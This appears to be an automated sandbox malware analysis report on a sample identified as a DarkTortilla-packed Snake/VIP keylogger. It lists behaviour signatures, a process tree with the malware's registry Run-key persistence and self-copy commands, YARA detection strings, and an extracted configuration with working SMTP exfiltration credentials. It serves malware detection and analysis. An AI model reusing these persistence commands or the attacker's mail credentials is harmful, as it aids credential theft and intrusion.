Edit tour

Windows Analysis Report
File.com.exe

Overview

General Information

Sample name:	File.com.exe
Analysis ID:	1494597
MD5:	8b4e3a62d01f4d0cf638607b5e7fb2a1
SHA1:	7af22d0699c5d98422672b502e3bdfec4d67ce96
SHA256:	4187407e94e390b8916206e2714b4941cacd06c60f9a8662f41b847cab5f2d5f
Tags:	comexe
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

File.com.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\File.com.exe" MD5: 8B4E3A62D01F4D0CF638607B5E7FB2A1)

cmd.exe (PID: 7512 cmdline: "cmd" /c ping 127.0.0.1 -n 17 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7556 cmdline: ping 127.0.0.1 -n 17 MD5: B3624DD758CCECF93A1226CEF252CA12)

reg.exe (PID: 7944 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xxlooa" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xxlooa.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 7728 cmdline: "cmd" /c ping 127.0.0.1 -n 21 > nul && copy "C:\Users\user\Desktop\File.com.exe" "C:\Users\user\AppData\Roaming\xxlooa.exe" && ping 127.0.0.1 -n 21 > nul && "C:\Users\user\AppData\Roaming\xxlooa.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7764 cmdline: ping 127.0.0.1 -n 21 MD5: B3624DD758CCECF93A1226CEF252CA12)

PING.EXE (PID: 8116 cmdline: ping 127.0.0.1 -n 21 MD5: B3624DD758CCECF93A1226CEF252CA12)

xxlooa.exe (PID: 7252 cmdline: "C:\Users\user\AppData\Roaming\xxlooa.exe" MD5: 8B4E3A62D01F4D0CF638607B5E7FB2A1)

AddInProcess32.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

xxlooa.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Roaming\xxlooa.exe" MD5: 8B4E3A62D01F4D0CF638607B5E7FB2A1)

xxlooa.exe (PID: 916 cmdline: "C:\Users\user\AppData\Roaming\xxlooa.exe" MD5: 8B4E3A62D01F4D0CF638607B5E7FB2A1)

AddInProcess32.exe (PID: 6936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000012.00000002.2709059333.0000000002806000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2962556300.0000000005327000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1839360978.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000012.00000002.2721219524.00000000041B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000013.00000002.2943610200.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000012.00000002.2721219524.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000013.00000002.2962597104.0000000005138000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x363ea:$a1: get_encryptedPassword 0x363be:$a2: get_encryptedUsername 0x36482:$a3: get_timePasswordChanged 0x3639a:$a4: get_passwordField 0x36400:$a5: set_encryptedPassword 0x361cd:$a7: get_logins 0x31a21:$a10: KeyLoggerEventArgs 0x319f0:$a11: KeyLoggerEventArgsEventHandler 0x362a1:$a13: _encryptedPassword
00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40100:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f7a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fa00:$a4: \Orbitum\User Data\Default\Login Data 0x403df:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33f92:$s1: UnHook 0x33f2e:$s2: SetHook 0x33f67:$s3: CallNextHook 0x33ef6:$s4: _hook
00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1837377657.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000011.00000002.2944387011.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1847264743.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2563514752.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000010.00000002.2574650182.0000000004396000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000010.00000002.2574650182.0000000004495000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1839360978.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: File.com.exe PID: 7328	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: File.com.exe PID: 7328	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: xxlooa.exe PID: 916	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: xxlooa.exe PID: 916	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AddInProcess32.exe PID: 6936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 6936	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: AddInProcess32.exe PID: 6936	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 6936	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe0814:$a1: get_encryptedPassword 0x151f17:$a1: get_encryptedPassword 0xe07e8:$a2: get_encryptedUsername 0x151eeb:$a2: get_encryptedUsername 0xe08ac:$a3: get_timePasswordChanged 0x151faf:$a3: get_timePasswordChanged 0xe07c4:$a4: get_passwordField 0x151ec7:$a4: get_passwordField 0xe082a:$a5: set_encryptedPassword 0x151f2d:$a5: set_encryptedPassword 0xe0600:$a7: get_logins 0x151d03:$a7: get_logins 0x17d942:$a7: get_logins 0x41b2d:$a10: KeyLoggerEventArgs 0xdd008:$a10: KeyLoggerEventArgs 0x41afc:$a11: KeyLoggerEventArgsEventHandler 0xdcfd7:$a11: KeyLoggerEventArgsEventHandler 0xe06cb:$a13: _encryptedPassword 0x151dce:$a13: _encryptedPassword
Process Memory Space: xxlooa.exe PID: 7252	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: xxlooa.exe PID: 7252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7592	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7592	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7592	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ef15:$a1: get_encryptedPassword 0x12eee9:$a2: get_encryptedUsername 0x12efad:$a3: get_timePasswordChanged 0x12eec5:$a4: get_passwordField 0x12ef2b:$a5: set_encryptedPassword 0x10f16:$a10: KeyLoggerEventArgs 0x10ee5:$a11: KeyLoggerEventArgsEventHandler 0x12edcc:$a13: _encryptedPassword
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.xxlooa.exe.41e3728.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f120:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
18.2.xxlooa.exe.414a812.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
18.2.xxlooa.exe.414a812.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.2.xxlooa.exe.449537a.1.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.449537a.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f036:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6b6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
18.2.xxlooa.exe.4117852.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
18.2.xxlooa.exe.4117852.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f040:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6c0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
18.2.xxlooa.exe.41b0772.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
18.2.xxlooa.exe.41b0772.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f036:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6b6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
16.2.xxlooa.exe.43c948a.4.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
16.2.xxlooa.exe.43c948a.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f050:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6d0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
18.2.xxlooa.exe.41e3728.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x33120:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
18.2.xxlooa.exe.4117852.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
18.2.xxlooa.exe.4117852.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x50070:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x33040:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x336c0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51d4a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51990:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x50e48:$s6: constructor or from DllMain.
0.2.File.com.exe.3cc6962.6.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3cc6962.6.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f036:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6b6:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
17.2.AddInProcess32.exe.52f0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.File.com.exe.3c2da42.1.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.File.com.exe.3c2da42.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f040:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f6c0:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: 